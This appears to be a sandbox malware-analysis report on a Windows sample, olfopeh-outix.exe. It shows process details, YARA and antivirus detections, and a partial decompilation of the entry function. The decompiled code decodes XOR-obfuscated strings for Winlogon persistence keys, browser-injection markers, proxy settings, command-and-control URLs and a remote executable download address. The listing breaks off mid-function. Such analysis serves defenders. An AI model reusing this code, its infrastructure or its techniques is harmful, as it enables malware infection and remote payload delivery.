Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: olfopeh-outix.exePID: 5168, Parent PID: 5360

General

Target ID:	1
Start time:	20:22:06
Start date:	08/12/2022
Path:	C:\Windows\SysWOW64\olfopeh-outix.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\olfopeh-outix.exe
Imagebase:	0x400000
File size:	90812 bytes
MD5 hash:	BFFE00256D8E388757322C0788A1876C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000000.313533493.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.314102961.000000000013B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.382741035.0000000000136000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.361259093.0000000000121000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.361204738.000000000013B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.382705490.0000000000136000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.382800704.0000000000136000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000003.361292004.0000000000132000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\SysWOW64\olfopeh-outix.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: olfopeh-outix.exePID: 5900, Parent PID: 5168

General

Target ID:	2
Start time:	20:22:06
Start date:	08/12/2022
Path:	C:\Windows\SysWOW64\olfopeh-outix.exe
Wow64 process (32bit):	true
Commandline:	--k33p
Imagebase:	0x400000
File size:	90812 bytes
MD5 hash:	BFFE00256D8E388757322C0788A1876C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000002.00000000.314055233.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Author: Florian Roth Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000002.00000002.579508394.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: winlogon.exePID: 564, Parent PID: 5168

General

Target ID:	3
Start time:	20:22:06
Start date:	08/12/2022
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff67ed60000
File size:	677376 bytes
MD5 hash:	F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 5168

General

Target ID:	4
Start time:	20:22:07
Start date:	08/12/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: KJEfMLiuRS.exePID: 5360, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.3%
Total number of Nodes:	767
Total number of Limit Nodes:	14

Executed Functions

Function 004033EB Relevance: 184.3, APIs: 32, Strings: 73, Instructions: 510
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_() {
				signed char _t492;
				signed char _t493;
				struct HINSTANCE__* _t494;
				CHAR* _t497;
				void* _t498;
				signed char _t499;
				signed int _t505;
				signed int _t506;
				signed char* _t509;
				struct HINSTANCE__* _t510;
				signed char* _t511;
				struct HINSTANCE__* _t512;
				signed char* _t513;
				signed char _t514;
				signed char _t515;
				signed char _t516;
				signed char _t517;
				signed char _t518;
				struct HINSTANCE__* _t519;
				signed char* _t520;
				signed char _t521;
				signed char _t522;
				signed char _t523;
				signed char _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t529;
				signed char _t530;
				signed char _t531;
				signed char _t532;
				signed char _t533;
				signed char _t534;
				signed char _t535;
				signed char _t536;
				signed char _t537;
				signed char _t538;
				signed char _t539;
				signed char _t540;
				signed char _t541;
				signed char _t542;
				signed char _t543;
				signed char _t544;
				signed char _t545;
				signed char _t546;
				signed char _t547;
				signed char _t548;
				signed char _t549;
				signed char _t550;
				signed char _t551;
				signed char _t552;
				signed char _t553;
				signed char _t554;
				signed char _t555;
				signed char _t556;
				signed char _t557;
				signed char _t558;
				signed char _t559;
				signed char _t560;
				signed char _t561;
				signed char _t562;
				signed char _t563;
				signed char _t564;
				signed char _t565;
				signed char _t566;
				signed char _t567;
				signed char _t568;
				signed char _t569;
				signed char _t570;
				signed char _t571;
				signed char _t572;
				signed char _t573;
				signed char _t574;
				signed char _t575;
				void* _t580;
				signed char* _t581;
				signed char _t582;
				int _t583;
				intOrPtr _t593;
				signed int _t595;
				signed char _t598;
				signed char _t599;
				signed char _t600;
				void* _t602;
				long _t603;
				void* _t604;
				void* _t606;
				char* _t611;
				void* _t614;
				signed char* _t633;
				void* _t636;
				void* _t638;
				void* _t639;
				void* _t640;
				void* _t644;
				void* _t645;
				void* _t646;
				CHAR* _t649;
				void* _t651;
				long _t652;
				CHAR* _t653;
				void* _t655;
				long _t656;
				CHAR* _t661;
				void* _t663;
				CHAR* _t664;
				void* _t666;
				char* _t676;
				void* _t677;
				signed char* _t682;
				void* _t685;
				void* _t686;
				void* _t692;
				void* _t693;
				void* _t698;
				void* _t703;
				void* _t705;
				void* _t707;
				void* _t711;
				void* _t713;
				void* _t718;
				long _t722;
				int _t723;
				void* _t729;
				void* _t731;
				void* _t734;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t750;
				void* _t753;
				void* _t755;
				void* _t758;
				void* _t760;
				void* _t764;
				void* _t769;
				void* _t771;
				void* _t773;
				CHAR* _t777;
				void* _t778;
				void* _t780;
				char* _t781;
				char* _t782;
				void* _t783;
				char* _t784;
				char* _t785;
				char* _t786;
				char* _t787;
				char* _t788;
				void* _t789;
				char* _t790;
				void* _t791;
				char* _t793;
				CHAR* _t794;
				void* _t798;
				void* _t800;
				int _t803;
				void* _t817;
				int _t818;
				void* _t821;
				CHAR* _t827;
				void* _t829;
				long _t830;
				void* _t835;
				void* _t843;
				void* _t844;
				signed char _t852;
				void* _t858;
				void* _t862;
				void* _t864;
				int _t865;
				void* _t868;
				signed char _t879;
				int _t880;
				signed char* _t881;
				void* _t882;
				void* _t884;
				void* _t889;
				void* _t891;
				void* _t892;
				char* _t893;
				signed int* _t896;
				long _t906;
				int _t907;
				signed char _t917;
				void* _t920;
				void* _t922;
				int _t923;
				CHAR* _t924;
				void* _t925;
				void* _t927;
				void* _t930;
				void* _t932;
				void* _t933;
				void* _t934;
				signed int* _t937;
				void* _t946;
				int _t947;
				signed char _t957;
				int _t965;
				CHAR* _t967;
				void* _t973;
				void* _t980;
				CHAR* _t985;
				void* _t986;
				void* _t988;
				void* _t990;
				void* _t997;
				void* _t999;
				void* _t1001;
				void* _t1004;
				signed int _t1007;
				void* _t1011;
				long _t1012;
				int _t1014;
				void* _t1024;
				void* _t1025;
				signed char* _t1093;
				signed char* _t1094;
				signed char* _t1095;
				signed char* _t1096;
				signed char* _t1097;
				signed char* _t1108;
				signed char* _t1110;
				signed char* _t1113;
				signed char* _t1115;
				signed char* _t1116;
				signed char* _t1117;
				signed char* _t1118;
				signed char* _t1119;
				struct HINSTANCE__* _t1120;
				signed int _t1124;
				signed char* _t1125;
				signed char* _t1126;
				void* _t1127;
				void* _t1128;
				void* _t1130;
				signed char* _t1132;
				void* _t1133;
				signed char _t1137;
				intOrPtr _t1139;
				void* _t1140;
				signed char _t1141;
				void* _t1144;
				int _t1147;
				CHAR* _t1156;
				_Unknown_base(*)()* _t1157;
				struct HINSTANCE__* _t1162;
				void* _t1165;
				struct HINSTANCE__* _t1166;
				struct HINSTANCE__* _t1167;
				struct HINSTANCE__* _t1168;
				CHAR* _t1169;
				CHAR* _t1170;
				char* _t1171;
				CHAR* _t1172;
				CHAR* _t1173;
				CHAR* _t1174;
				CHAR* _t1175;
				CHAR* _t1176;
				CHAR* _t1177;
				CHAR* _t1178;
				char* _t1179;
				void** _t1180;
				char* _t1181;
				char* _t1182;
				CHAR* _t1183;
				void* _t1186;
				char* _t1187;
				char* _t1189;
				char* _t1190;
				char* _t1191;
				char* _t1192;
				CHAR* _t1193;
				int _t1194;
				CHAR* _t1195;
				CHAR* _t1196;
				void* _t1197;
				signed int* _t1199;
				char* _t1200;
				void* _t1201;
				CHAR* _t1202;
				CHAR* _t1203;
				void* _t1204;
				signed int* _t1206;
				char* _t1207;
				CHAR* _t1208;
				struct _STARTUPINFOA* _t1209;
				void* _t1210;
				void* _t1211;
				long _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				CHAR* _t1216;
				struct HINSTANCE__* _t1217;
				signed char* _t1218;
				void* _t1219;
				struct _STARTUPINFOA* _t1220;
				signed char _t1221;
				char* _t1225;
				char* _t1226;
				void* _t1227;
				signed char _t1229;
				signed char _t1230;
				intOrPtr* _t1231;
				signed int _t1232;
				signed char _t1237;
				char _t1238;
				char _t1239;
				void* _t1240;
				signed int* _t1264;
				signed char* _t1265;
				signed char* _t1266;
				signed int* _t1268;
				signed int* _t1271;
				void* _t1276;
				void* _t1277;
				char* _t1279;
				signed char* _t1280;
				void* _t1281;
				void* _t1282;
				long _t1283;
				signed int _t1284;
				void* _t1285;
				signed int* _t1287;
				void** _t1288;
				void* _t1290;
				void** _t1291;
				void** _t1292;
				char* _t1293;
				CHAR* _t1294;
				signed char* _t1295;
				char* _t1296;
				signed int* _t1297;
				void* _t1298;
				void* _t1299;
				char* _t1300;
				signed int* _t1301;
				void* _t1302;
				char* _t1303;
				signed int* _t1304;
				CHAR* _t1306;
				void* _t1307;
				void* _t1308;
				signed int* _t1309;
				void* _t1310;
				void* _t1311;
				void* _t1312;
				long _t1313;
				struct _FILETIME* _t1314;
				void* _t1315;
				void* _t1316;
				char* _t1317;

				E00405C00();
				 *(_t1316 + 0x2c) = 0;
				 *(_t1316 + 0x28) = 0;
				 *(_t1316 + 0x24) = 0;
				 *(_t1316 + 0x20) = 0;
				 *(_t1316 + 0xc) = 0;
				 *0x412290 = GetProcessHeap();
				0x4120f0->dwOSVersionInfoSize = 0x94;
				GetVersionExA(0x4120f0);
				_t492 = "--k33p";
				while(_t492 < 0x4107f9) {
					 *_t492 =  *_t492 ^ 0x000000d4;
					_t492 = (_t492 ^ _t1229) + 1;
				}
				_t493 = "kernel32.dll";
				while(1) {
					__eflags = _t493 - 0x4107f2;
					if(_t493 >= 0x4107f2) {
						break;
					}
					 *_t493 =  *_t493 ^ 0x000000d4;
					__eflags =  *_t493;
					_t493 = (_t493 ^ _t1229) + 1;
				}
				_t494 = LoadLibraryA("kernel32.dll");
				__eflags =  *0x412100 - 2;
				_t1162 = _t494;
				if( *0x412100 == 2) {
					L14:
					GetModuleFileNameA(0, _t1316 + 0x156c, 0x104);
					_t497 = GetCommandLineA();
					_t1230 = "--k33p";
					_t498 = E00401311(_t497, _t1230);
					__eflags = _t498;
					if(_t498 == 0) {
						__eflags =  *0x412100 - 2;
						_t499 = 0x410723;
						if( *0x412100 != 2) {
							while(1) {
								__eflags = _t499 - 0x410735;
								if(_t499 >= 0x410735) {
									break;
								}
								 *_t499 =  *_t499 ^ 0x000000d4;
								__eflags =  *_t499;
								_t499 = (_t499 ^ _t1230) + 1;
							}
							_t1231 = GetProcAddress(_t1162, 0x410723);
							while(1) {
								__eflags =  *_t1231 - 0xfff00068;
								if( *_t1231 == 0xfff00068) {
									break;
								}
								_t1231 = _t1231 + 1;
							}
							_t1232 = _t1231 +  *((intOrPtr*)(_t1231 + 7));
							 *0x412270 = _t1232 + 0xb;
							 *0x412280 =  *[fs:0x30];
							 *0x412280 =  *0x412280 ^ GetCurrentProcessId();
							__eflags =  *0x412280;
							L77:
							_push(_t1316 + 0xb78);
							_push(2); // executed
							L004061E0(); // executed
							_t505 = GetTickCount();
							_t506 = GetCurrentProcessId();
							_t1165 = _t505 ^ _t506 ^ GetCurrentThreadId() << 0x00000010;
							__eflags = _t1165;
							_t509 = "rasapi32.dll";
							 *0x4122a0 = _t1165;
							while(1) {
								__eflags = _t509 - 0x410722;
								if(_t509 >= 0x410722) {
									break;
								}
								 *_t509 =  *_t509 ^ 0x000000d4;
								_t509 =  &(_t509[1]);
							}
							_t510 = LoadLibraryA("rasapi32.dll"); // executed
							__eflags = _t510;
							_t1166 = _t510;
							if(_t510 == 0) {
								 *0x4121b0 = 0;
								L86:
								_t511 = "iphlpapi.dll";
								while(1) {
									__eflags = _t511 - 0x410701;
									if(_t511 >= 0x410701) {
										break;
									}
									 *_t511 =  *_t511 ^ 0x000000d4;
									_t511 =  &(_t511[1]);
								}
								_t512 = LoadLibraryA("iphlpapi.dll"); // executed
								__eflags = _t512;
								_t1167 = _t512;
								if(_t512 == 0) {
									 *0x4121c0 = 0;
									L95:
									_t513 = "_Classes";
									while(1) {
										__eflags = _t513 - 0x4106e5;
										if(_t513 >= 0x4106e5) {
											break;
										}
										 *_t513 =  *_t513 ^ 0x000000d4;
										_t513 =  &(_t513[1]);
									}
									_t514 = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings";
									while(1) {
										__eflags = _t514 - 0x4106dc;
										if(_t514 >= 0x4106dc) {
											break;
										}
										 *_t514 =  *_t514 ^ 0x000000d4;
										__eflags =  *_t514;
										_t514 = (_t514 ^ _t1232) + 1;
									}
									_t515 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections";
									while(1) {
										__eflags = _t515 - 0x410687;
										if(_t515 >= 0x410687) {
											break;
										}
										 *_t515 =  *_t515 ^ 0x000000d4;
										__eflags =  *_t515;
										_t515 = (_t515 ^ _t1232) + 1;
									}
									_t516 = "ProxyEnable";
									while(1) {
										__eflags = _t516 - 0x410621;
										if(_t516 >= 0x410621) {
											break;
										}
										 *_t516 =  *_t516 ^ 0x000000d4;
										__eflags =  *_t516;
										_t516 = (_t516 ^ _t1232) + 1;
									}
									_t517 = "Connections";
									while(1) {
										__eflags = _t517 - 0x410615;
										if(_t517 >= 0x410615) {
											break;
										}
										 *_t517 =  *_t517 ^ 0x000000d4;
										__eflags =  *_t517;
										_t517 = (_t517 ^ _t1232) + 1;
									}
									_t518 = "wininet.dll";
									while(1) {
										__eflags = _t518 - 0x410609;
										if(_t518 >= 0x410609) {
											break;
										}
										 *_t518 =  *_t518 ^ 0x000000d4;
										__eflags =  *_t518;
										_t518 = (_t518 ^ _t1232) + 1;
									}
									_t519 = LoadLibraryA("wininet.dll"); // executed
									__eflags = _t519;
									_t1168 = _t519;
									if(_t519 == 0) {
										 *0x4121d0 = 0;
										L136:
										_t520 = "winrnt.exe";
										while(1) {
											__eflags = _t520 - 0x4105a6;
											if(_t520 >= 0x4105a6) {
												break;
											}
											 *_t520 =  *_t520 ^ 0x000000d4;
											_t520 =  &(_t520[1]);
										}
										_t521 = "rmass.exe";
										while(1) {
											__eflags = _t521 - 0x41059b;
											if(_t521 >= 0x41059b) {
												break;
											}
											 *_t521 =  *_t521 ^ 0x000000d4;
											__eflags =  *_t521;
											_t521 = (_t521 ^ _t1232) + 1;
										}
										_t522 = "RECOVER32.DLL";
										while(1) {
											__eflags = _t522 - 0x410591;
											if(_t522 >= 0x410591) {
												break;
											}
											 *_t522 =  *_t522 ^ 0x000000d4;
											__eflags =  *_t522;
											_t522 = (_t522 ^ _t1232) + 1;
										}
										_t523 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}";
										while(1) {
											__eflags = _t523 - 0x410583;
											if(_t523 >= 0x410583) {
												break;
											}
											 *_t523 =  *_t523 ^ 0x000000d4;
											__eflags =  *_t523;
											_t523 = (_t523 ^ _t1232) + 1;
										}
										_t524 = "gymspzd.dll";
										while(1) {
											__eflags = _t524 - 0x41051a;
											if(_t524 >= 0x41051a) {
												break;
											}
											 *_t524 =  *_t524 ^ 0x000000d4;
											__eflags =  *_t524;
											_t524 = (_t524 ^ _t1232) + 1;
										}
										_t525 = "aset32.exe";
										while(1) {
											__eflags = _t525 - 0x41050e;
											if(_t525 >= 0x41050e) {
												break;
											}
											 *_t525 =  *_t525 ^ 0x000000d4;
											__eflags =  *_t525;
											_t525 = (_t525 ^ _t1232) + 1;
										}
										_t526 = "ahuy.exe";
										while(1) {
											__eflags = _t526 - 0x410503;
											if(_t526 >= 0x410503) {
												break;
											}
											 *_t526 =  *_t526 ^ 0x000000d4;
											__eflags =  *_t526;
											_t526 = (_t526 ^ _t1232) + 1;
										}
										_t527 = "idbg32.exe";
										while(1) {
											__eflags = _t527 - 0x4104fa;
											if(_t527 >= 0x4104fa) {
												break;
											}
											 *_t527 =  *_t527 ^ 0x000000d4;
											__eflags =  *_t527;
											_t527 = (_t527 ^ _t1232) + 1;
										}
										_t528 = "ntdbg.exe";
										while(1) {
											__eflags = _t528 - 0x4104ef;
											if(_t528 >= 0x4104ef) {
												break;
											}
											 *_t528 =  *_t528 ^ 0x000000d4;
											__eflags =  *_t528;
											_t528 = (_t528 ^ _t1232) + 1;
										}
										_t529 = "http://%s.biz/d/N?";
										while(1) {
											__eflags = _t529 - 0x4104e5;
											if(_t529 >= 0x4104e5) {
												break;
											}
											 *_t529 =  *_t529 ^ 0x000000d4;
											__eflags =  *_t529;
											_t529 = (_t529 ^ _t1232) + 1;
										}
										_t530 = "http://%s.biz/d/G?";
										while(1) {
											__eflags = _t530 - 0x4104d2;
											if(_t530 >= 0x4104d2) {
												break;
											}
											 *_t530 =  *_t530 ^ 0x000000d4;
											__eflags =  *_t530;
											_t530 = (_t530 ^ _t1232) + 1;
										}
										_t531 = "http://utbidet-ugeas.biz/d/rpt?";
										while(1) {
											__eflags = _t531 - 0x4104bf;
											if(_t531 >= 0x4104bf) {
												break;
											}
											 *_t531 =  *_t531 ^ 0x000000d4;
											__eflags =  *_t531;
											_t531 = (_t531 ^ _t1232) + 1;
										}
										_t532 = "modem";
										while(1) {
											__eflags = _t532 - 0x41049d;
											if(_t532 >= 0x41049d) {
												break;
											}
											 *_t532 =  *_t532 ^ 0x000000d4;
											__eflags =  *_t532;
											_t532 = (_t532 ^ _t1232) + 1;
										}
										_t533 = "isdn";
										while(1) {
											__eflags = _t533 - 0x410497;
											if(_t533 >= 0x410497) {
												break;
											}
											 *_t533 =  *_t533 ^ 0x000000d4;
											__eflags =  *_t533;
											_t533 = (_t533 ^ _t1232) + 1;
										}
										_t534 = "%u.%u.%u.%s";
										while(1) {
											__eflags = _t534 - 0x410492;
											if(_t534 >= 0x410492) {
												break;
											}
											 *_t534 =  *_t534 ^ 0x000000d4;
											__eflags =  *_t534;
											_t534 = (_t534 ^ _t1232) + 1;
										}
										_t535 = "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}";
										while(1) {
											__eflags = _t535 - 0x410486;
											if(_t535 >= 0x410486) {
												break;
											}
											 *_t535 =  *_t535 ^ 0x000000d4;
											__eflags =  *_t535;
											_t535 = (_t535 ^ _t1232) + 1;
										}
										_t536 = "%ComSpec%";
										while(1) {
											__eflags = _t536 - 0x410425;
											if(_t536 >= 0x410425) {
												break;
											}
											 *_t536 =  *_t536 ^ 0x000000d4;
											__eflags =  *_t536;
											_t536 = (_t536 ^ _t1232) + 1;
										}
										_t537 = "%CommonProgramFiles%\\System\\";
										while(1) {
											__eflags = _t537 - 0x41041b;
											if(_t537 >= 0x41041b) {
												break;
											}
											 *_t537 =  *_t537 ^ 0x000000d4;
											__eflags =  *_t537;
											_t537 = (_t537 ^ _t1232) + 1;
										}
										_t538 = "%AppData%\\";
										while(1) {
											__eflags = _t538 - 0x4103fe;
											if(_t538 >= 0x4103fe) {
												break;
											}
											 *_t538 =  *_t538 ^ 0x000000d4;
											__eflags =  *_t538;
											_t538 = (_t538 ^ _t1232) + 1;
										}
										_t539 = "Debugger";
										while(1) {
											__eflags = _t539 - 0x4103f3;
											if(_t539 >= 0x4103f3) {
												break;
											}
											 *_t539 =  *_t539 ^ 0x000000d4;
											__eflags =  *_t539;
											_t539 = (_t539 ^ _t1232) + 1;
										}
										_t540 = "IsInstalled";
										while(1) {
											__eflags = _t540 - 0x4103ea;
											if(_t540 >= 0x4103ea) {
												break;
											}
											 *_t540 =  *_t540 ^ 0x000000d4;
											__eflags =  *_t540;
											_t540 = (_t540 ^ _t1232) + 1;
										}
										_t541 = "StubPath";
										while(1) {
											__eflags = _t541 - 0x4103de;
											if(_t541 >= 0x4103de) {
												break;
											}
											 *_t541 =  *_t541 ^ 0x000000d4;
											__eflags =  *_t541;
											_t541 = (_t541 ^ _t1232) + 1;
										}
										_t542 = "museum";
										while(1) {
											__eflags = _t542 - 0x4103d5;
											if(_t542 >= 0x4103d5) {
												break;
											}
											 *_t542 =  *_t542 ^ 0x000000d4;
											__eflags =  *_t542;
											_t542 = (_t542 ^ _t1232) + 1;
										}
										_t543 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
										while(1) {
											__eflags = _t543 - 0x4103ce;
											if(_t543 >= 0x4103ce) {
												break;
											}
											 *_t543 =  *_t543 ^ 0x000000d4;
											__eflags =  *_t543;
											_t543 = (_t543 ^ _t1232) + 1;
										}
										_t544 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
										while(1) {
											__eflags = _t544 - 0x410371;
											if(_t544 >= 0x410371) {
												break;
											}
											 *_t544 =  *_t544 ^ 0x000000d4;
											__eflags =  *_t544;
											_t544 = (_t544 ^ _t1232) + 1;
										}
										_t545 = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)";
										while(1) {
											__eflags = _t545 - 0x410309;
											if(_t545 >= 0x410309) {
												break;
											}
											 *_t545 =  *_t545 ^ 0x000000d4;
											__eflags =  *_t545;
											_t545 = (_t545 ^ _t1232) + 1;
										}
										_t546 = "HTTP/1.0 200";
										while(1) {
											__eflags = _t546 - 0x4102c8;
											if(_t546 >= 0x4102c8) {
												break;
											}
											 *_t546 =  *_t546 ^ 0x000000d4;
											__eflags =  *_t546;
											_t546 = (_t546 ^ _t1232) + 1;
										}
										_t547 = "urlinj_conn";
										while(1) {
											__eflags = _t547 - 0x4102bb;
											if(_t547 >= 0x4102bb) {
												break;
											}
											 *_t547 =  *_t547 ^ 0x000000d4;
											__eflags =  *_t547;
											_t547 = (_t547 ^ _t1232) + 1;
										}
										_t548 = "urlinj_creat";
										while(1) {
											__eflags = _t548 - 0x4102af;
											if(_t548 >= 0x4102af) {
												break;
											}
											 *_t548 =  *_t548 ^ 0x000000d4;
											__eflags =  *_t548;
											_t548 = (_t548 ^ _t1232) + 1;
										}
										_t549 = "urlinj_xfer";
										while(1) {
											__eflags = _t549 - 0x4102a2;
											if(_t549 >= 0x4102a2) {
												break;
											}
											 *_t549 =  *_t549 ^ 0x000000d4;
											__eflags =  *_t549;
											_t549 = (_t549 ^ _t1232) + 1;
										}
										_t550 = "urlinj_creat_f";
										while(1) {
											__eflags = _t550 - 0x410296;
											if(_t550 >= 0x410296) {
												break;
											}
											 *_t550 =  *_t550 ^ 0x000000d4;
											__eflags =  *_t550;
											_t550 = (_t550 ^ _t1232) + 1;
										}
										_t551 = "urlinj_fork";
										while(1) {
											__eflags = _t551 - 0x410287;
											if(_t551 >= 0x410287) {
												break;
											}
											 *_t551 =  *_t551 ^ 0x000000d4;
											__eflags =  *_t551;
											_t551 = (_t551 ^ _t1232) + 1;
										}
										_t552 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
										while(1) {
											__eflags = _t552 - 0x41027b;
											if(_t552 >= 0x41027b) {
												break;
											}
											 *_t552 =  *_t552 ^ 0x000000d4;
											__eflags =  *_t552;
											_t552 = (_t552 ^ _t1232) + 1;
										}
										_t553 = "ConnPred";
										while(1) {
											__eflags = _t553 - 0x410230;
											if(_t553 >= 0x410230) {
												break;
											}
											 *_t553 =  *_t553 ^ 0x000000d4;
											__eflags =  *_t553;
											_t553 = (_t553 ^ _t1232) + 1;
										}
										_t554 = "UseExtProfile";
										while(1) {
											__eflags = _t554 - 0x410227;
											if(_t554 >= 0x410227) {
												break;
											}
											 *_t554 =  *_t554 ^ 0x000000d4;
											__eflags =  *_t554;
											_t554 = (_t554 ^ _t1232) + 1;
										}
										_t555 = "UseDflProfile";
										while(1) {
											__eflags = _t555 - 0x410219;
											if(_t555 >= 0x410219) {
												break;
											}
											 *_t555 =  *_t555 ^ 0x000000d4;
											__eflags =  *_t555;
											_t555 = (_t555 ^ _t1232) + 1;
										}
										_t556 = "http://utbidet-ugeas.biz/d/cc";
										while(1) {
											__eflags = _t556 - 0x41020b;
											if(_t556 >= 0x41020b) {
												break;
											}
											 *_t556 =  *_t556 ^ 0x000000d4;
											__eflags =  *_t556;
											_t556 = (_t556 ^ _t1232) + 1;
										}
										_t557 = "grazie.gif";
										while(1) {
											__eflags = _t557 - 0x4101ed;
											if(_t557 >= 0x4101ed) {
												break;
											}
											 *_t557 =  *_t557 ^ 0x000000d4;
											__eflags =  *_t557;
											_t557 = (_t557 ^ _t1232) + 1;
										}
										_t558 = "http://69.50.173.166/gdnOT2424.exe";
										while(1) {
											__eflags = _t558 - 0x4101e2;
											if(_t558 >= 0x4101e2) {
												break;
											}
											 *_t558 =  *_t558 ^ 0x000000d4;
											__eflags =  *_t558;
											_t558 = (_t558 ^ _t1232) + 1;
										}
										_t559 = "tombul.gif";
										while(1) {
											__eflags = _t559 - 0x4101a5;
											if(_t559 >= 0x4101a5) {
												break;
											}
											 *_t559 =  *_t559 ^ 0x000000d4;
											__eflags =  *_t559;
											_t559 = (_t559 ^ _t1232) + 1;
										}
										_t560 = "SubshellState";
										while(1) {
											__eflags = _t560 - 0x41019a;
											if(_t560 >= 0x41019a) {
												break;
											}
											 *_t560 =  *_t560 ^ 0x000000d4;
											__eflags =  *_t560;
											_t560 = (_t560 ^ _t1232) + 1;
										}
										_t561 = "g00d d0gg";
										while(1) {
											__eflags = _t561 - 0x41018c;
											if(_t561 >= 0x41018c) {
												break;
											}
											 *_t561 =  *_t561 ^ 0x000000d4;
											__eflags =  *_t561;
											_t561 = (_t561 ^ _t1232) + 1;
										}
										_t562 = "winlogon.exe";
										while(1) {
											__eflags = _t562 - 0x410182;
											if(_t562 >= 0x410182) {
												break;
											}
											 *_t562 =  *_t562 ^ 0x000000d4;
											__eflags =  *_t562;
											_t562 = (_t562 ^ _t1232) + 1;
										}
										_t563 = "explorer.exe";
										while(1) {
											__eflags = _t563 - 0x410175;
											if(_t563 >= 0x410175) {
												break;
											}
											 *_t563 =  *_t563 ^ 0x000000d4;
											__eflags =  *_t563;
											_t563 = (_t563 ^ _t1232) + 1;
										}
										_t564 = "iexplore.exe";
										while(1) {
											__eflags = _t564 - 0x410168;
											if(_t564 >= 0x410168) {
												break;
											}
											 *_t564 =  *_t564 ^ 0x000000d4;
											__eflags =  *_t564;
											_t564 = (_t564 ^ _t1232) + 1;
										}
										_t565 = "firefox.exe";
										while(1) {
											__eflags = _t565 - 0x41015b;
											if(_t565 >= 0x41015b) {
												break;
											}
											 *_t565 =  *_t565 ^ 0x000000d4;
											__eflags =  *_t565;
											_t565 = (_t565 ^ _t1232) + 1;
										}
										_t566 = "mozilla.exe";
										while(1) {
											__eflags = _t566 - 0x41014f;
											if(_t566 >= 0x41014f) {
												break;
											}
											 *_t566 =  *_t566 ^ 0x000000d4;
											__eflags =  *_t566;
											_t566 = (_t566 ^ _t1232) + 1;
										}
										_t567 = "seamonkey.exe";
										while(1) {
											__eflags = _t567 - 0x410143;
											if(_t567 >= 0x410143) {
												break;
											}
											 *_t567 =  *_t567 ^ 0x000000d4;
											__eflags =  *_t567;
											_t567 = (_t567 ^ _t1232) + 1;
										}
										_t568 = "opera.exe";
										while(1) {
											__eflags = _t568 - 0x410135;
											if(_t568 >= 0x410135) {
												break;
											}
											 *_t568 =  *_t568 ^ 0x000000d4;
											__eflags =  *_t568;
											_t568 = (_t568 ^ _t1232) + 1;
										}
										_t569 = "DLLName";
										while(1) {
